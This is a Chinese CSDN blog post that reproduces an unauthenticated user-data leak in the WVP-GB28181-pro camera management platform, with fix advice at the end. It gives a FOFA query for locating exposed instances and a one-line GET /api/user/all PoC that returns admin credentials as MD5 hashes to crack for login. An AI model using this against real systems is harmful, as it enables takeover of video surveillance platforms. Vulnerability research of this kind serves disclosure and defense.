WVP-GB28181摄像头管理平台 user 信息泄露漏洞复现

已于 2024-05-11 16:27:05 修改
阅读量1.5k 收藏 3
点赞数 4
分类专栏: 漏洞复现 文章标签: 安全 web安全
于 2024-05-11 16:26:58 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41904294/article/details/138720266
版权
本文介绍了WVP-GB28181摄像头管理平台存在的用户信息泄露漏洞,详细阐述了漏洞概述、复现环境和复现过程,并提供了修复建议,包括删除敏感接口和实施访问控制。
摘要由CSDN通过智能技术生成

0x01 产品简介

GB28181是公共安全视频监控联网系统信息传输、交换、控制技术要求的标准。该标准主要定义了基于IP网络的音视频监控系统的整体架构,包括前端设备、存储设备、管理平台等组成部分,以及设备接入、流媒体传输、信令交互、存储管理、安全防护和平台管理等方面的要求。

0x02 漏洞概述

WVP-GB28181-pro开源物联网摄像头管理平台api/user接口村存在信息泄露漏洞,攻击者可利用漏洞获取当前系统管理员用户名及密码进行登录系统,使系统处于极不安全的状态

0x03 复现环境

FOFA:body="国标28181"

0x04 漏洞复现

PoC

GET /api/user/all HTTP/1.1
Host: your-ip

解密密码md5值即可登录后台

0x05 修复建议

删除该接口或设置访问控制

升级至安全版本

0xSecl
关注
专栏目录
订阅专栏
漏洞复现WVP视频平台未授权漏洞
晚风不及你
06-11 884
WVP视频平台api/user存在未授权访问漏洞,攻击者可利用漏洞获取当前系统管理员用户名及密码进行登录系统。
漏洞复现】Hikvision摄像头产品代码执行漏洞(CVE-2021-36260)
晚风不及你
01-20 4583
Hikvision(海康威视)是一家在中国颇具影响力的安防公司,其网络摄像头产品在市场上占据了相当大的份额。Hikvision的网络摄像头产品线非常丰富,涵盖了各种型号和功能,以满足不同用户的需求。
GB28181摄像头管理平台WVP视频平台SQL注入漏洞复现 [附POC]
薛定谔嘚喵博客
07-26 799
GB28181摄像头管理平台WVP视频平台存在SQL注入漏洞,攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。
海康摄像头CVE-2021-36260漏洞复现
热门推荐
剁椒鱼头没剁椒的博客
01-06 2万+
攻击者利用该漏洞可以用无限制的 root shell 来完全控制设备,即使设备的所有者受限于有限的受保护 shell(psh)。除了入侵 IP 摄像头外,还可以访问和攻击内部网络。该漏洞的利用并不需要用户交互,攻击者只需要访问 http 或 HTTPS 服务器端口(80/443)即可利用该漏洞,无需用户名、密码、以及其他操作。摄像头本身也不会检测到任何登录信息
GB28181-WVP-PRO公网部署(不使用docker部署)--保姆级(centos7+ )
最新发布
weixin_50012753的博客
09-11 2335
网上centos,wvp+zml公网部署的文章比较少 因公司需要,自己花了两天左右时间在公网部署了wvp+zml平台,现在整体记录一下具体流程` 如果自己的服务器为window和Ubuntu部署的话这里就不展开一个一个演示把这个centos公网部署操作明白,其他系统部署都不难
WVP-GB28181摄像头管理平台存在敏感信息泄露
weixin_43167326的博客
05-16 1232
GB28181是公共安全视频监控联网系统信息传输、交换、控制技术要求的标准。该标准主要定义了基于IP网络的音视频监控系统的整体架构,包括前端设备、存储设备、管理平台等组成部分,以及设备接入、流媒体传输、信令父旦、仔储管理安全防护和平台管理等方面的要求。。
NUUO网络摄像头(NVR)RCE漏洞复现
The current road is different, love needs to distinguish between right and wrong
11-03 743
NUUO Network Video Recorder(NVR)是中国台湾NUUO公司的一款网络视频记录器。NUUO NVR视频存储管理设备的__debugging_center_utils___.php文件存在未授权远程命令执行漏洞,攻击者可在没有任何权限的情况下通过log参数执行任意命令。没有人规定,一朵花一定要成长为向日葵或者玫瑰。
wvp-GB28181_wvp-gb28181_wvpgb28181_GB28181_
10-04
wvp-GB28181系统是基于GB28181标准开发的服务端平台,它集成了多种功能模块,以满足GB28181规定的各项操作需求。系统的核心功能包括初始化、注册、注销、心跳以及Invite等关键流程,这些功能的实现对于确保系统的...
wvp-GB28181-pro 适配支持 SQlite3 数据库 支持wvp-GB28181-pro 2.6.9
02-28
wvp-GB28181-pro 适配支持 SQlite3 数据库 支持wvp-GB28181-pro 2.6.9
wvp-GB28181-pro及ZLMediaKit打包好的安装脚本
06-27
wvp-GB28181-pro直装版,内附安装说明,安装的时候参考说明去安装,正常情况下只需修改wvp-GB28181-pro的配置文件内的ip即可正常接入GB28181摄像头,里面功能都可正常使用。mysql,redis,jdk都附带了脚本直装,安装...
wvp-GB28181:WEB视频平台是一个基于GB28181-2016标准实现的网络视频平台,负责实现核心信令与设备管理后台部分,支持NAT穿透,支持海康,大华,宇视等品牌的IPC,NVR,DVR接入。流媒体服务基于ZLMediaKit-https
03-19
wvp Web视频平台是一个基于GB28181-2016标准实现的网络视频平台,负责实现核心信令与设备管理后台部分,支持NAT穿透,支持海康,大华,宇视等品牌的IPC,NVR,DVR接入。流媒体服务基于ZLMediaKit- 前端展示基于MediaServerUI- 应用场景: 主要应用在IPC等设备没有固定IP地址,但需要在互联网中观看的场景。要求IPC设备可以访问互联网,有云服务器用于部署本服务。预计7个月可以达到商用级别的文档性 支持特性: 1,视频预览2,云台控制(方向,缩放控制) 3,视频设备信息同步4,离在线监控5,录像查询和回放(基于NVR \ DVR,暂不支持快进,seek操作) 6,无人观看自动断流 2020路线图: 5月中旬-视频快照(基于NVR \ DVR),设备认证(基于密码) 5月下旬-设备报警6月上旬-流媒体认证(ZLM推流,取流) 6月下旬-语音对​
wvp-GB28181-pro-2.7.2jar包
06-07
【标题】"wvp-GB28181-pro-2.7.2jar包" 涉及的关键技术是GB28181标准、WVP视频监控平台)和Java开发的程序包(jar文件)。GB28181是中国国家针对IP视频监控系统制定的一套统一标准,它规定了设备间的互联互通、...
漏洞复现】Hikvision摄像头产品越权漏洞(CVE-2017-7921)
晚风不及你
01-20 1966
Hikvision(海康威视)是一家在中国颇具影响力的安防公司,其网络摄像头产品在市场上占据了相当大的份额。Hikvision的网络摄像头产品线非常丰富,涵盖了各种型号和功能,以满足不同用户的需求。
漏洞复现WVP-GB28181摄像头管理平台 user 信息泄露
weixin_42207802的博客
05-17 478
漏洞复现WVP-GB28181摄像头管理平台 user 信息泄露
漏洞复现】网络摄像头——弱口令
LongL_GuYu的博客
07-08 1865
诸多主流摄像头存在弱口令
某购物商城系统commodtiy接口处存在任意文件上传漏洞
weixin_43167326的博客
05-10 945
某购物商城系统commodtiy接口处存在任意文件上传漏洞,恶意攻击者可以上传恶意软件,例如后门、木马或勒索软件,以获取对服务器的远程访问权限或者破坏系统,对服务器造成极大的安全隐患。
漏洞复现】泛微OA E-Cology getdata.jsp SQL注入漏洞
alert['Hello World']
07-18 605
泛微OA E-Cology getdata.jsp 接口存在一个 SQL 注入漏洞,通过这个漏洞可以操纵服务器的数据库。这意味着不法分子可以利用这个漏洞来获取对数据库的完全控制权,从而查看、修改甚至删除数据库中的数据,严重威胁系统的安全性。
wvp-gb28181 森云摄像头
06-12
WVP-GB28181是森云科技(Shen Yun Technology)推出的一款遵循GB28181标准的网络视频监控系统协议。GB28181是中国安防行业的一项标准,用于定义视频监控系统的通信接口和数据交换规范。WVP-GB28181摄像头支持通过该标准与其他监控平台、NVR(网络录像机)或安防监控系统进行无缝连接,实现了远程监控、录像回放、设备管理等功能。 这款摄像头的特点可能包括: 1. **开放兼容**:由于采用了GB28181标准,它可以与市场上大部分支持该标准的监控平台集成,具有高度的通用性和灵活性。 2. **高清图像质量**:通常配备高清摄像头,提供清晰的视频画面。 3. **智能功能**:可能具备人脸识别、移动侦测等AI智能分析功能。 4. **远程访问**:用户可以通过手机APP或网页端实时查看摄像头的画面,实现远程监控。 5. **稳定可靠**:遵循工业级通信协议,保证视频传输的稳定性。
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

0xSecl

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值